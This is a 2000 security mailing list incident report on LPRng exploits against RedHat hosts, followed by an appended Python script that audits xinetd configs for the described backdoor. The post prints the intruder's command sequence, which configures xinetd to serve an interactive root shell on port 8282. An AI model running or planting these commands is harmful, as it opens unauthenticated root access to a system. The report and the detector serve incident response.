Security Incidents mailing list archives

LPRng exploits


From: Kathy Bergsma <kathya () nersp nerdc ufl edu>
Date: Wed, 29 Nov 2000 15:29:12 -0500

Port 515 on our network was scanned from uiowa.edu over the weekend.
Here's some information on the LPRng exploits attempted against several
RedHat Linux 7.x hosts.  The intruder attempts to create a file called
/dev/whoa/reg.  It looks like they intend for reg to open port 8282 with
root privileges.  They then edit xinetd.conf file and restart xinetd to
open the port.  Evidence of these changes was cleared from compromised
hosts once the intruder installed his kit.  A password protected guest
account with a GID of 0 was created on one compromised host.  The
following files were also changed:  du, find, ls, netstat, passwd, ping,
psr, and su.

Shown below is session data from the exploit.  Shown first is the format
string used to execute a root shell.  Shown after that are the commands
executed from the shell.

--
Kathy Bergsma
Network Security Coordinator




mkdir /dev/whoa ; echo "service reg" >> /dev/whoa/reg ; echo "{" > /dev/whoa/reg; echo "socket_type = stream" > /dev/whoa/reg;
echo "port = 8282" >> /dev/whoa/reg; echo "protocol = tcp" >> /dev/whoa/reg; echo "wait = no" >> /dev/whoa/reg;
echo "user = root" >> /dev/whoa/reg ; echo "server = /bin/sh" >> /dev/whoa/reg ; echo "server_args = -i" >> /dev/whoa/reg;
echo "}" >> /dev/whoa/reg ; echo "includedir /dev/whoa" >> /etc/xinetd.conf ; nohup /etc/rc.d/init.d/xinetd restart >> /dev/null 2>> /dev/null;
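An added defender-side check, not part of the original post: it parses xinetd configuration text and flags the two features of the backdoor described in the report, an includedir outside /etc/xinetd.d and a service running as root whose server is an interactive shell. The sample configuration below is constructed to mirror the stanza the intruder wrote into /dev/whoa/reg; the list of shells and the trusted includedir set are assumptions.

```python
# Constructed sample: the stock includedir plus the stanza appended via /dev/whoa/reg.
SAMPLE_XINETD = """\
includedir /etc/xinetd.d
includedir /dev/whoa
service reg
{
socket_type = stream
port = 8282
protocol = tcp
wait = no
user = root
server = /bin/sh
server_args = -i
}
"""

SHELLS = {"/bin/sh", "/bin/bash", "/bin/csh", "/bin/tcsh", "/bin/ksh"}  # assumed list
TRUSTED_INCLUDEDIRS = {"/etc/xinetd.d"}  # assumed: the only legitimate includedir

def parse_xinetd(text):
    """Return (includedirs, {service_name: {attr: value}}) from xinetd.conf text."""
    includedirs, services, name, attrs = [], {}, None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line == "{":
            continue
        if line.startswith("includedir"):
            includedirs.append(line.split(None, 1)[1])
        elif line.startswith("service"):
            name, attrs = line.split(None, 1)[1], {}
        elif line == "}" and attrs is not None:
            services[name], attrs = attrs, None  # close the current stanza
        elif "=" in line and attrs is not None:
            key, _, value = line.partition("=")
            attrs[key.strip()] = value.strip()
    return includedirs, services

def audit_xinetd(text):
    """List config features that match the backdoor described in the report."""
    findings = []
    includedirs, services = parse_xinetd(text)
    for d in includedirs:
        if d not in TRUSTED_INCLUDEDIRS:  # e.g. a directory hidden under /dev
            findings.append(f"includedir outside trusted set: {d}")
    for name, a in services.items():
        if a.get("server") in SHELLS:
            findings.append(f"service {name}: server is a shell ({a['server']})")
        if a.get("user") == "root" and "-i" in a.get("server_args", "").split():
            findings.append(f"service {name}: interactive root shell on port {a.get('port', '?')}")
    return findings
```

Run it against the contents of /etc/xinetd.conf and every file under its includedirs; a clean host returns an empty list.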

